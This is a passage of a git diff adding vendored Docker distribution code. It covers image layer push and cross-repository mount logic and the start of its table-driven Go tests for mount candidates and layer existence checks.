+			// Cache mapping from this layer's DiffID to the blobsum
+			if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{
+				Digest:           err.Descriptor.Digest,
+				SourceRepository: pd.repoInfo.FullName(),
+			}); err != nil {
+				return distribution.Descriptor{}, xfer.DoNotRetry{Err: err}
+			}
+			return err.Descriptor, nil
+		default:
+			logrus.Infof("failed to mount layer %s (%s) from %s: %v", diffID, mountCandidate.Digest, mountCandidate.SourceRepository, err)
+		}
+
+		if len(mountCandidate.SourceRepository) > 0 &&
+			(metadata.CheckV2MetadataHMAC(&mountCandidate, pd.hmacKey) ||
+				len(mountCandidate.HMAC) == 0) {
+			cause := "blob mount failure"
+			if err != nil {
+				cause = fmt.Sprintf("an error: %v", err.Error())
+			}
+			logrus.Debugf("removing association between layer %s and %s due to %s", mountCandidate.Digest, mountCandidate.SourceRepository, cause)
+			pd.v2MetadataService.Remove(mountCandidate)
+		}
+
+		if lu != nil {
+			// cancel previous upload
+			cancelLayerUpload(ctx, mountCandidate.Digest, layerUpload)
+			layerUpload = lu
+		}
+	}
+
+	if maxExistenceChecks-len(pd.checkedDigests) > 0 {
+		// do additional layer existence checks with other known digests if any
+		descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, checkOtherRepositories, maxExistenceChecks-len(pd.checkedDigests), v2Metadata)
+		if exists || err != nil {
+			return descriptor, err
+		}
+	}
+
+	logrus.Debugf("Pushing layer: %s", diffID)
+	if layerUpload == nil {
+		layerUpload, err = bs.Create(ctx)
+		if err != nil {
+			return distribution.Descriptor{}, retryOnError(err)
+		}
+	}
+	defer layerUpload.Close()
+
+	// upload the blob
+	desc, err := pd.uploadUsingSession(ctx, progressOutput, diffID, layerUpload)
+	if err != nil {
+		return desc, err
+	}
+
+	return desc, nil
+}
+
+func (pd *v2PushDescriptor) SetRemoteDescriptor(descriptor distribution.Descriptor) {
+	pd.remoteDescriptor = descriptor
+}
+
+func (pd *v2PushDescriptor) Descriptor() distribution.Descriptor {
+	return pd.remoteDescriptor
+}
+
+func (pd *v2PushDescriptor) uploadUsingSession(
+	ctx context.Context,
+	progressOutput progress.Output,
+	diffID layer.DiffID,
+	layerUpload distribution.BlobWriter,
+) (distribution.Descriptor, error) {
+	var reader io.ReadCloser
+
+	contentReader, err := pd.layer.Open()
+	size, _ := pd.layer.Size()
+
+	reader = progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, contentReader), progressOutput, size, pd.ID(), "Pushing")
+
+	switch m := pd.layer.MediaType(); m {
+	case schema2.MediaTypeUncompressedLayer:
+		compressedReader, compressionDone := compress(reader)
+		defer func(closer io.Closer) {
+			closer.Close()
+			<-compressionDone
+		}(reader)
+		reader = compressedReader
+	case schema2.MediaTypeLayer:
+	default:
+		reader.Close()
+		return distribution.Descriptor{}, fmt.Errorf("unsupported layer media type %s", m)
+	}
+
+	digester := digest.Canonical.New()
+	tee := io.TeeReader(reader, digester.Hash())
+
+	nn, err := layerUpload.ReadFrom(tee)
+	reader.Close()
+	if err != nil {
+		return distribution.Descriptor{}, retryOnError(err)
+	}
+
+	pushDigest := digester.Digest()
+	if _, err := layerUpload.Commit(ctx, distribution.Descriptor{Digest: pushDigest}); err != nil {
+		return distribution.Descriptor{}, retryOnError(err)
+	}
+
+	logrus.Debugf("uploaded layer %s (%s), %d bytes", diffID, pushDigest, nn)
+	progress.Update(progressOutput, pd.ID(), "Pushed")
+
+	// Cache mapping from this layer's DiffID to the blobsum
+	if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{
+		Digest:           pushDigest,
+		SourceRepository: pd.repoInfo.FullName(),
+	}); err != nil {
+		return distribution.Descriptor{}, xfer.DoNotRetry{Err: err}
+	}
+
+	desc := distribution.Descriptor{
+		Digest:    pushDigest,
+		MediaType: schema2.MediaTypeLayer,
+		Size:      nn,
+	}
+
+	pd.pushState.Lock()
+	// If Commit succeeded, that's an indication that the remote registry speaks the v2 protocol.
+	pd.pushState.confirmedV2 = true
+	pd.pushState.remoteLayers[diffID] = desc
+	pd.pushState.Unlock()
+
+	return desc, nil
+}
+
+// layerAlreadyExists checks if the registry already knows about any of the metadata passed in the "metadata"
+// slice. If it finds one that the registry knows about, it returns the known digest and "true". If
+// "checkOtherRepositories" is true, stat will be performed also with digests mapped to any other repository
+// (not just the target one).
+func (pd *v2PushDescriptor) layerAlreadyExists(
+	ctx context.Context,
+	progressOutput progress.Output,
+	diffID layer.DiffID,
+	checkOtherRepositories bool,
+	maxExistenceCheckAttempts int,
+	v2Metadata []metadata.V2Metadata,
+) (desc distribution.Descriptor, exists bool, err error) {
+	// filter the metadata
+	candidates := []metadata.V2Metadata{}
+	for _, meta := range v2Metadata {
+		if len(meta.SourceRepository) > 0 && !checkOtherRepositories && meta.SourceRepository != pd.repoInfo.FullName() {
+			continue
+		}
+		candidates = append(candidates, meta)
+	}
+	// sort the candidates by similarity
+	sortV2MetadataByLikenessAndAge(pd.repoInfo, pd.hmacKey, candidates)
+
+	digestToMetadata := make(map[digest.Digest]*metadata.V2Metadata)
+	// an array of unique blob digests ordered from the best mount candidates to worst
+	layerDigests := []digest.Digest{}
+	for i := 0; i < len(candidates); i++ {
+		if len(layerDigests) >= maxExistenceCheckAttempts {
+			break
+		}
+		meta := &candidates[i]
+		if _, exists := digestToMetadata[meta.Digest]; exists {
+			// keep reference just to the first mapping (the best mount candidate)
+			continue
+		}
+		if _, exists := pd.checkedDigests[meta.Digest]; exists {
+			// existence of this digest has already been tested
+			continue
+		}
+		digestToMetadata[meta.Digest] = meta
+		layerDigests = append(layerDigests, meta.Digest)
+	}
+
+attempts:
+	for _, dgst := range layerDigests {
+		meta := digestToMetadata[dgst]
+		logrus.Debugf("Checking for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName())
+		desc, err = pd.repo.Blobs(ctx).Stat(ctx, dgst)
+		pd.checkedDigests[meta.Digest] = struct{}{}
+		switch err {
+		case nil:
+			if m, ok := digestToMetadata[desc.Digest]; !ok || m.SourceRepository != pd.repoInfo.FullName() || !metadata.CheckV2MetadataHMAC(m, pd.hmacKey) {
+				// cache mapping from this layer's DiffID to the blobsum
+				if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{
+					Digest:           desc.Digest,
+					SourceRepository: pd.repoInfo.FullName(),
+				}); err != nil {
+					return distribution.Descriptor{}, false, xfer.DoNotRetry{Err: err}
+				}
+			}
+			desc.MediaType = schema2.MediaTypeLayer
+			exists = true
+			break attempts
+		case distribution.ErrBlobUnknown:
+			if meta.SourceRepository == pd.repoInfo.FullName() {
+				// remove the mapping to the target repository
+				pd.v2MetadataService.Remove(*meta)
+			}
+		default:
+			logrus.WithError(err).Debugf("Failed to check for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName())
+		}
+	}
+
+	if exists {
+		progress.Update(progressOutput, pd.ID(), "Layer already exists")
+		pd.pushState.Lock()
+		pd.pushState.remoteLayers[diffID] = desc
+		pd.pushState.Unlock()
+	}
+
+	return desc, exists, nil
+}
+
+// getMaxMountAndExistenceCheckAttempts returns a maximum number of cross repository mount attempts from
+// source repositories of target registry, maximum number of layer existence checks performed on the target
+// repository and whether the check shall be done also with digests mapped to different repositories. The
+// decision is based on layer size. The smaller the layer, the fewer attempts shall be made because the cost
+// of upload does not outweigh a latency.
+func getMaxMountAndExistenceCheckAttempts(layer PushLayer) (maxMountAttempts, maxExistenceCheckAttempts int, checkOtherRepositories bool) {
+	size, err := layer.Size()
+	switch {
+	// big blob
+	case size > middleLayerMaximumSize:
+		// 1st attempt to mount the blob few times
+		// 2nd few existence checks with digests associated to any repository
+		// then fallback to upload
+		return 4, 3, true
+
+	// middle sized blobs; if we could not get the size, assume we deal with middle sized blob
+	case size > smallLayerMaximumSize, err != nil:
+		// 1st attempt to mount blobs of average size few times
+		// 2nd try at most 1 existence check if there's an existing mapping to the target repository
+		// then fallback to upload
+		return 3, 1, false
+
+	// small blobs, do a minimum number of checks
+	default:
+		return 1, 1, false
+	}
+}
+
+// getRepositoryMountCandidates returns an array of v2 metadata items belonging to the given registry. The
+// array is sorted from youngest to oldest. If requireReigstryMatch is true, the resulting array will contain
+// only metadata entries having registry part of SourceRepository matching the part of repoInfo.
+func getRepositoryMountCandidates(
+	repoInfo reference.Named,
+	hmacKey []byte,
+	max int,
+	v2Metadata []metadata.V2Metadata,
+) []metadata.V2Metadata {
+	candidates := []metadata.V2Metadata{}
+	for _, meta := range v2Metadata {
+		sourceRepo, err := reference.ParseNamed(meta.SourceRepository)
+		if err != nil || repoInfo.Hostname() != sourceRepo.Hostname() {
+			continue
+		}
+		// target repository is not a viable candidate
+		if meta.SourceRepository == repoInfo.FullName() {
+			continue
+		}
+		candidates = append(candidates, meta)
+	}
+
+	sortV2MetadataByLikenessAndAge(repoInfo, hmacKey, candidates)
+	if max >= 0 && len(candidates) > max {
+		// select the youngest metadata
+		candidates = candidates[:max]
+	}
+
+	return candidates
+}
+
+// byLikeness is a sorting container for v2 metadata candidates for cross repository mount. The
+// candidate "a" is preferred over "b":
+//
+//  1. if it was hashed using the same AuthConfig as the one used to authenticate to target repository and the
+//     "b" was not
+//  2. if a number of its repository path components exactly matching path components of target repository is higher
+type byLikeness struct {
+	arr            []metadata.V2Metadata
+	hmacKey        []byte
+	pathComponents []string
+}
+
+func (bla byLikeness) Less(i, j int) bool {
+	aMacMatch := metadata.CheckV2MetadataHMAC(&bla.arr[i], bla.hmacKey)
+	bMacMatch := metadata.CheckV2MetadataHMAC(&bla.arr[j], bla.hmacKey)
+	if aMacMatch != bMacMatch {
+		return aMacMatch
+	}
+	aMatch := numOfMatchingPathComponents(bla.arr[i].SourceRepository, bla.pathComponents)
+	bMatch := numOfMatchingPathComponents(bla.arr[j].SourceRepository, bla.pathComponents)
+	return aMatch > bMatch
+}
+func (bla byLikeness) Swap(i, j int) {
+	bla.arr[i], bla.arr[j] = bla.arr[j], bla.arr[i]
+}
+func (bla byLikeness) Len() int { return len(bla.arr) }
+
+func sortV2MetadataByLikenessAndAge(repoInfo reference.Named, hmacKey []byte, marr []metadata.V2Metadata) {
+	// reverse the metadata array to shift the newest entries to the beginning
+	for i := 0; i < len(marr)/2; i++ {
+		marr[i], marr[len(marr)-i-1] = marr[len(marr)-i-1], marr[i]
+	}
+	// keep equal entries ordered from the youngest to the oldest
+	sort.Stable(byLikeness{
+		arr:            marr,
+		hmacKey:        hmacKey,
+		pathComponents: getPathComponents(repoInfo.FullName()),
+	})
+}
+
+// numOfMatchingPathComponents returns a number of path components in "pth" that exactly match "matchComponents".
+func numOfMatchingPathComponents(pth string, matchComponents []string) int {
+	pthComponents := getPathComponents(pth)
+	i := 0
+	for ; i < len(pthComponents) && i < len(matchComponents); i++ {
+		if matchComponents[i] != pthComponents[i] {
+			return i
+		}
+	}
+	return i
+}
+
+func getPathComponents(path string) []string {
+	// make sure to add docker.io/ prefix to the path
+	named, err := reference.ParseNamed(path)
+	if err == nil {
+		path = named.FullName()
+	}
+	return strings.Split(path, "/")
+}
+
+func cancelLayerUpload(ctx context.Context, dgst digest.Digest, layerUpload distribution.BlobWriter) {
+	if layerUpload != nil {
+		logrus.Debugf("cancelling upload of blob %s", dgst)
+		err := layerUpload.Cancel(ctx)
+		if err != nil {
+			logrus.Warnf("failed to cancel upload: %v", err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/distribution/push_v2_test.go b/vendor/github.com/docker/docker/distribution/push_v2_test.go
new file mode 100644
index 0000000000..6a5216b1d0
--- /dev/null
+++ b/vendor/github.com/docker/docker/distribution/push_v2_test.go
@@ -0,0 +1,579 @@
+package distribution
+
+import (
+	"net/http"
+	"reflect"
+	"testing"
+
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/context"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/manifest/schema2"
+	distreference "github.com/docker/distribution/reference"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/progress"
+	"github.com/docker/docker/reference"
+)
+
+func TestGetRepositoryMountCandidates(t *testing.T) {
+	for _, tc := range []struct {
+		name          string
+		hmacKey       string
+		targetRepo    string
+		maxCandidates int
+		metadata      []metadata.V2Metadata
+		candidates    []metadata.V2Metadata
+	}{
+		{
+			name:          "empty metadata",
+			targetRepo:    "busybox",
+			maxCandidates: -1,
+			metadata:      []metadata.V2Metadata{},
+			candidates:    []metadata.V2Metadata{},
+		},
+		{
+			name:          "one item not matching",
+			targetRepo:    "busybox",
+			maxCandidates: -1,
+			metadata:      []metadata.V2Metadata{taggedMetadata("key", "dgst", "127.0.0.1/repo")},
+			candidates:    []metadata.V2Metadata{},
+		},
+		{
+			name:          "one item matching",
+			targetRepo:    "busybox",
+			maxCandidates: -1,
+			metadata:      []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")},
+			candidates:    []metadata.V2Metadata{taggedMetadata("hash", "1", "hello-world")},
+		},
+		{
+			name:          "allow missing SourceRepository",
+			targetRepo:    "busybox",
+			maxCandidates: -1,
+			metadata: []metadata.V2Metadata{
+				{Digest: digest.Digest("1")},
+				{Digest: digest.Digest("3")},
+				{Digest: digest.Digest("2")},
+			},
+			candidates: []metadata.V2Metadata{},
+		},
+		{
+			name:          "handle docker.io",
+			targetRepo:    "user/app",
+			maxCandidates: -1,
+			metadata: []metadata.V2Metadata{
+				{Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"},
+				{Digest: digest.Digest("3"), SourceRepository: "user/bar"},
+				{Digest: digest.Digest("2"), SourceRepository: "app"},
+			},
+			candidates: []metadata.V2Metadata{
+				{Digest: digest.Digest("3"), SourceRepository: "user/bar"},
+				{Digest: digest.Digest("1"), SourceRepository: "docker.io/user/foo"},
+				{Digest: digest.Digest("2"), SourceRepository: "app"},
+			},
+		},
+		{
+			name:          "sort more items",
+			hmacKey:       "abcd",
+			targetRepo:    "127.0.0.1/foo/bar",
+			maxCandidates: -1,
+			metadata: []metadata.V2Metadata{
+				taggedMetadata("hash", "1", "hello-world"),
+				taggedMetadata("efgh", "2", "127.0.0.1/hello-world"),
+				taggedMetadata("abcd", "3", "busybox"),
+				taggedMetadata("hash", "4", "busybox"),
+				taggedMetadata("hash", "5", "127.0.0.1/foo"),
+				taggedMetadata("hash", "6", "127.0.0.1/bar"),
+				taggedMetadata("efgh", "7", "127.0.0.1/foo/bar"),
+				taggedMetadata("abcd", "8", "127.0.0.1/xyz"),
+				taggedMetadata("hash", "9", "127.0.0.1/foo/app"),
+			},
+			candidates: []metadata.V2Metadata{
+				// first by matching hash
+				taggedMetadata("abcd", "8", "127.0.0.1/xyz"),
+				// then by longest matching prefix
+				taggedMetadata("hash", "9", "127.0.0.1/foo/app"),
+				taggedMetadata("hash", "5", "127.0.0.1/foo"),
+				// sort the rest of the matching items in reversed order
+				taggedMetadata("hash", "6", "127.0.0.1/bar"),
+				taggedMetadata("efgh", "2", "127.0.0.1/hello-world"),
+			},
+		},
+		{
+			name:          "limit max candidates",
+			hmacKey:       "abcd",
+			targetRepo:    "user/app",
+			maxCandidates: 3,
+			metadata: []metadata.V2Metadata{
+				taggedMetadata("abcd", "1", "user/app1"),
+				taggedMetadata("abcd", "2", "user/app/base"),
+				taggedMetadata("hash", "3", "user/app"),
+				taggedMetadata("abcd", "4", "127.0.0.1/user/app"),
+				taggedMetadata("hash", "5", "user/foo"),
+				taggedMetadata("hash", "6", "app/bar"),
+			},
+			candidates: []metadata.V2Metadata{
+				// first by matching hash
+				taggedMetadata("abcd", "2", "user/app/base"),
+				taggedMetadata("abcd", "1", "user/app1"),
+				// then by longest matching prefix
+				taggedMetadata("hash", "3", "user/app"),
+			},
+		},
+	} {
+		repoInfo, err := reference.ParseNamed(tc.targetRepo)
+		if err != nil {
+			t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err)
+		}
+		candidates := getRepositoryMountCandidates(repoInfo, []byte(tc.hmacKey), tc.maxCandidates, tc.metadata)
+		if len(candidates) != len(tc.candidates) {
+			t.Errorf("[%s] got unexpected number of candidates: %d != %d", tc.name, len(candidates), len(tc.candidates))
+		}
+		for i := 0; i < len(candidates) && i < len(tc.candidates); i++ {
+			if !reflect.DeepEqual(candidates[i], tc.candidates[i]) {
+				t.Errorf("[%s] candidate %d does not match expected: %#+v != %#+v", tc.name, i, candidates[i], tc.candidates[i])
+			}
+		}
+		for i := len(candidates); i < len(tc.candidates); i++ {
+			t.Errorf("[%s] missing expected candidate at position %d (%#+v)", tc.name, i, tc.candidates[i])
+		}
+		for i := len(tc.candidates); i < len(candidates); i++ {
+			t.Errorf("[%s] got unexpected candidate at position %d (%#+v)", tc.name, i, candidates[i])
+		}
+	}
+}
+
+func TestLayerAlreadyExists(t *testing.T) {
+	for _, tc := range []struct {
+		name                   string
+		metadata               []metadata.V2Metadata
+		targetRepo             string
+		hmacKey                string
+		maxExistenceChecks     int
+		checkOtherRepositories bool
+		remoteBlobs            map[digest.Digest]distribution.Descriptor
+		remoteErrors           map[digest.Digest]error
+		expectedDescriptor     distribution.Descriptor
+		expectedExists         bool
+		expectedError          error
+		expectedRequests       []string
+		expectedAdditions      []metadata.V2Metadata
+		expectedRemovals       []metadata.V2Metadata
+	}{
+		{
+			name:                   "empty metadata",
+			targetRepo:             "busybox",
+			maxExistenceChecks:     3,
+			checkOtherRepositories: true,
+		},
+		{
+			name:               "single not existent metadata",
+			targetRepo:         "busybox",
+			metadata:           []metadata.V2Metadata{{Digest: digest.Digest("pear"), SourceRepository: "docker.io/library/busybox"}},
+			maxExistenceChecks: 3,
+			expectedRequests:   []string{"pear"},
+			expectedRemovals:   []metadata.V2Metadata{{Digest: digest.Digest("pear"), SourceRepository: "docker.io/library/busybox"}},
+		},
+		{
+			name:               "access denied",
+			targetRepo:         "busybox",
+			maxExistenceChecks: 1,
+			metadata:           []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}},
+			remoteErrors:       map[digest.Digest]error{digest.Digest("apple"): distribution.ErrAccessDenied},
+			expectedError:      nil,
+			expectedRequests:   []string{"apple"},
+		},
+		{
+			name:               "not matching reposies",
+			targetRepo:         "busybox",
+			maxExistenceChecks: 3,
+			metadata: []metadata.V2Metadata{
+				{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/hello-world"},
+				{Digest: digest.Digest("orange"), SourceRepository: "docker.io/library/busybox/subapp"},
+				{Digest: digest.Digest("pear"), SourceRepository: "docker.io/busybox"},
+				{Digest: digest.Digest("plum"), SourceRepository: "busybox"},
+				{Digest: digest.Digest("banana"), SourceRepository: "127.0.0.1/busybox"},
+			},
+		},
+		{
+			name:                   "check other repositories",
+			targetRepo:             "busybox",
+			maxExistenceChecks:     10,
+			checkOtherRepositories: true,
+			metadata: []metadata.V2Metadata{
+				{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/hello-world"},
+				{Digest: digest.Digest("orange"), SourceRepository: "docker.io/library/busybox/subapp"},
+				{Digest: digest.Digest("pear"), SourceRepository: "docker.io/busybox"},
+				{Digest: digest.Digest("plum"), SourceRepository: "busybox"},
+				{Digest: digest.Digest("banana"), SourceRepository: "127.0.0.1/busybox"},
+			},
+			expectedRequests: []string{"plum", "pear", "apple", "orange", "banana"},
+		},
+		{
+			name:               "find existing blob",
+			targetRepo:         "busybox",
+			metadata:           []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}},
+			maxExistenceChecks: 3,
+			remoteBlobs:        map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {Digest: digest.Digest("apple")}},
+			expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("apple"), MediaType: schema2.MediaTypeLayer},
+			expectedExists:     true,
+			expectedRequests:   []string{"apple"},
+		},
+		{
+			name:               "find existing blob with different hmac",
+			targetRepo:         "busybox",
+			metadata:           []metadata.V2Metadata{{SourceRepository: "docker.io/library/busybox", Digest: digest.Digest("apple"), HMAC: "dummyhmac"}},
+			maxExistenceChecks: 3,
+			remoteBlobs:        map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {Digest: digest.Digest("apple")}},
+			expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("apple"), MediaType: schema2.MediaTypeLayer},
+			expectedExists:     true,
+			expectedRequests:   []string{"apple"},
+			expectedAdditions:  []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}},
+		},
+		{
+			name:               "overwrite media types",
+			targetRepo:         "busybox",
+			metadata:           []metadata.V2Metadata{{Digest: digest.Digest("apple"), SourceRepository: "docker.io/library/busybox"}},
+			hmacKey:            "key",
+			maxExistenceChecks: 3,
+			remoteBlobs:        map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {Digest: digest.Digest("apple"), MediaType: "custom-media-type"}},
+			expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("apple"), MediaType: schema2.MediaTypeLayer},
+			expectedExists:     true,
+			expectedRequests:   []string{"apple"},
+			expectedAdditions:  []metadata.V2Metadata{taggedMetadata("key", "apple", "docker.io/library/busybox")},
+		},
+		{
+			name:       "find existing blob among many",
+			targetRepo: "127.0.0.1/myapp",
+			hmacKey:    "key",
+			metadata: []metadata.V2Metadata{
+				taggedMetadata("someotherkey", "pear", "127.0.0.1/myapp"),
+				taggedMetadata("key", "apple", "127.0.0.1/myapp"),
+				taggedMetadata("", "plum", "127.0.0.1/myapp"),
+			},
+			maxExistenceChecks: 3,
+			remoteBlobs:        map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}},
+			expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("pear"), MediaType: schema2.MediaTypeLayer},
+			expectedExists:     true,
+			expectedRequests:   []string{"apple", "plum", "pear"},
+			expectedAdditions:  []metadata.V2Metadata{taggedMetadata("key", "pear", "127.0.0.1/myapp")},
+			expectedRemovals: []metadata.V2Metadata{
+				taggedMetadata("key", "apple", "127.0.0.1/myapp"),
+				{Digest: digest.Digest("plum"), SourceRepository: "127.0.0.1/myapp"},
+			},
+		},
+		{
+			name:       "reach maximum existence checks",
+			targetRepo: "user/app",
+			metadata: []metadata.V2Metadata{
+				{Digest: digest.Digest("pear"), SourceRepository: "docker.io/user/app"},
+				{Digest: digest.Digest("apple"), SourceRepository: "docker.io/user/app"},
+				{Digest: digest.Digest("plum"), SourceRepository: "docker.io/user/app"},
+				{Digest: digest.Digest("banana"), SourceRepository: "docker.io/user/app"},
+			},
+			maxExistenceChecks: 3,
+			remoteBlobs:        map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}},
+			expectedExists:     false,
+			expectedRequests:   []string{"banana", "plum", "apple"},
+			expectedRemovals: []metadata.V2Metadata{
+				{Digest: digest.Digest("banana"), SourceRepository: "docker.io/user/app"},
+				{Digest: digest.Digest("plum"), SourceRepository: "docker.io/user/app"},
+				{Digest: digest.Digest("apple"), SourceRepository: "docker.io/user/app"},
+			},
+		},
+		{
+			name:       "zero allowed existence checks",
+			targetRepo: "user/app",
+			metadata: []metadata.V2Metadata{
+				{Digest: digest.Digest("pear"), SourceRepository: "docker.io/user/app"},
+				{Digest: digest.Digest("apple"), SourceRepository: "docker.io/user/app"},
+				{Digest: digest.Digest("plum"), SourceRepository: "docker.io/user/app"},
+				{Digest: digest.Digest("banana"), SourceRepository: "docker.io/user/app"},
+			},
+			maxExistenceChecks: 0,
+			remoteBlobs:        map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}},
+		},
+		{
+			name:       "stat single digest just once",
+			targetRepo: "busybox",
+			metadata: []metadata.V2Metadata{
+				taggedMetadata("key1", "pear", "docker.io/library/busybox"),
+				taggedMetadata("key2", "apple", "docker.io/library/busybox"),
+				taggedMetadata("key3", "apple", "docker.io/library/busybox"),
+			},
+			maxExistenceChecks: 3,
+			remoteBlobs:        map[digest.Digest]distribution.Descriptor{digest.Digest("pear"): {Digest: digest.Digest("pear")}},
+			expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("pear"), MediaType: schema2.MediaTypeLayer},
+			expectedExists:     true,
+			expectedRequests:   []string{"apple", "pear"},
+			expectedAdditions:  []metadata.V2Metadata{{Digest: digest.Digest("pear"), SourceRepository: "docker.io/library/busybox"}},
+			expectedRemovals:   []metadata.V2Metadata{taggedMetadata("key3", "apple", "docker.io/library/busybox")},
+		},
+		{
+			name:       "don't stop on first error",
+			targetRepo: "user/app",
+			hmacKey:    "key",
+			metadata: []metadata.V2Metadata{
+				taggedMetadata("key", "banana", "docker.io/user/app"),
+				taggedMetadata("key", "orange", "docker.io/user/app"),
+				taggedMetadata("key", "plum", "docker.io/user/app"),
+			},
+			maxExistenceChecks: 3,
+			remoteErrors:       map[digest.Digest]error{"orange": distribution.ErrAccessDenied},
+			remoteBlobs:        map[digest.Digest]distribution.Descriptor{digest.Digest("apple"): {}},
+			expectedError:      nil,
+			expectedRequests:   []string{"plum", "orange", "banana"},
+			expectedRemovals: []metadata.V2Metadata{
+				taggedMetadata("key", "plum", "docker.io/user/app"),
+				taggedMetadata("key", "banana", "docker.io/user/app"),
+			},
+		},
+		{
+			name:       "remove outdated metadata",
+			targetRepo: "docker.io/user/app",
+			metadata: []metadata.V2Metadata{
+				{Digest: digest.Digest("plum"), SourceRepository: "docker.io/library/busybox"},
+				{Digest: digest.Digest("orange"), SourceRepository: "docker.io/user/app"},
+			},
+			maxExistenceChecks: 3,
+			remoteErrors:       map[digest.Digest]error{"orange": distribution.ErrBlobUnknown},
+			remoteBlobs:        map[digest.Digest]distribution.Descriptor{digest.Digest("plum"): {}},
+			expectedExists:     false,
+			expectedRequests:   []string{"orange"},
+			expectedRemovals:   []metadata.V2Metadata{{Digest: digest.Digest("orange"), SourceRepository: "docker.io/user/app"}},
+		},
+		{
+			name:       "missing SourceRepository",
+			targetRepo: "busybox",
+			metadata: []metadata.V2Metadata{
+				{Digest: digest.Digest("1")},
+				{Digest: digest.Digest("3")},
+				{Digest: digest.Digest("2")},
+			},
+			maxExistenceChecks: 3,
+			expectedExists:     false,
+			expectedRequests:   []string{"2", "3", "1"},
+		},
+
+		{
+			name:       "with and without SourceRepository",
+			targetRepo: "busybox",
+			metadata: []metadata.V2Metadata{
+				{Digest: digest.Digest("1")},
+				{Digest: digest.Digest("2"), SourceRepository: "docker.io/library/busybox"},
+				{Digest: digest.Digest("3")},
+			},
+			remoteBlobs:        map[digest.Digest]distribution.Descriptor{digest.Digest("1"): {Digest: digest.Digest("1")}},
+			maxExistenceChecks: 3,
+			expectedDescriptor: distribution.Descriptor{Digest: digest.Digest("1"), MediaType: schema2.MediaTypeLayer},
+			expectedExists:     true,
+			expectedRequests:   []string{"2", "3", "1"},
+			expectedAdditions:  []metadata.V2Metadata{{Digest: digest.Digest("1"), SourceRepository: "docker.io/library/busybox"}},
+			expectedRemovals: []metadata.V2Metadata{
+				{Digest: digest.Digest("2"), SourceRepository: "docker.io/library/busybox"},
+			},
+		},
+	} {
+		repoInfo, err := reference.ParseNamed(tc.targetRepo)
+		if err != nil {
+			t.Fatalf("[%s] failed to parse reference name: %v", tc.name, err)
+		}
+		repo := &mockRepo{
+			t:        t,
+			errors:   tc.remoteErrors,
+			blobs:    tc.remoteBlobs,
+			requests: []string{},
+		}
+		ctx := context.Background()
+		ms := &mockV2MetadataService{}
+		pd := &v2PushDescriptor{
+			hmacKey:  []byte(tc.hmacKey),
+			repoInfo: repoInfo,
+			layer: &storeLayer{
+				Layer: layer.EmptyLayer,
+			},
+			repo:              repo,
+			v2MetadataService: ms,
+			pushState:         &pushState{remoteLayers: make(map[layer.DiffID]distribution.Descriptor)},
+			checkedDigests:    make(map[digest.Digest]struct{}),
+		}
+
+		desc, exists, err := pd.layerAlreadyExists(ctx, &progressSink{t}, layer.EmptyLayer.DiffID(), tc.checkOtherRepositories, tc.maxExistenceChecks, tc.metadata)
+
+		if !reflect.DeepEqual(desc, tc.expectedDescriptor) {
+			t.Errorf("[%s] got unexpected descriptor: %#+v != %#+v", tc.name, desc, tc.expectedDescriptor)
+		}
+		if exists != tc.expectedExists {
+			t.Errorf("[%s] got unexpected exists: %t != %t", tc.name, exists, tc.expectedExists)
+		}
+		if !reflect.DeepEqual(err, tc.expectedError) {
+			t.Errorf("[%s] got unexpected error: %#+v != %#+v", tc.name, err, tc.expectedError)
+		}
+
+		if len(repo.requests) != len(tc.expectedRequests) {
+			t.Errorf("[%s] got unexpected number of requests: %d != %d", tc.name, len(repo.requests), len(tc.expectedRequests))
+		}
+		for i := 0; i < len(repo.requests) && i < len(tc.expectedRequests); i++ {
+			if repo.requests[i] != tc.expectedRequests[i] {
+				t.Errorf("[%s] request %d does not match expected: %q != %q", tc.name, i, repo.requests[i], tc.expectedRequests[i])
+			}
+		}
+		for i := len(repo.requests); i < len(tc.expectedRequests); i++ {
+			t.Errorf("[%s] missing expected request at position %d (%q)", tc.name, i, tc.expectedRequests[i])
+		}
+		for i := len(tc.expectedRequests); i < len(repo.requests); i++ {
+			t.Errorf("[%s] got unexpected request at position %d (%q)", tc.name, i, repo.requests[i])
+		}
+
+		if len(ms.added) != len(tc.expectedAdditions) {
+			t.Errorf("[%s] got unexpected number of additions: %d != %d", tc.name, len(ms.added), len(tc.expectedAdditions))
+		}
+		for i := 0; i < len(ms.added) && i < len(tc.expectedAdditions); i++ {
+			if ms.added[i] != tc.expectedAdditions[i] {
+				t.Errorf("[%s] added metadata at %d does not match expected: %q != %q", tc.name, i, ms.added[i], tc.expectedAdditions[i])
+			}
+		}
+		for i := len(ms.added); i < len(tc.expectedAdditions); i++ {
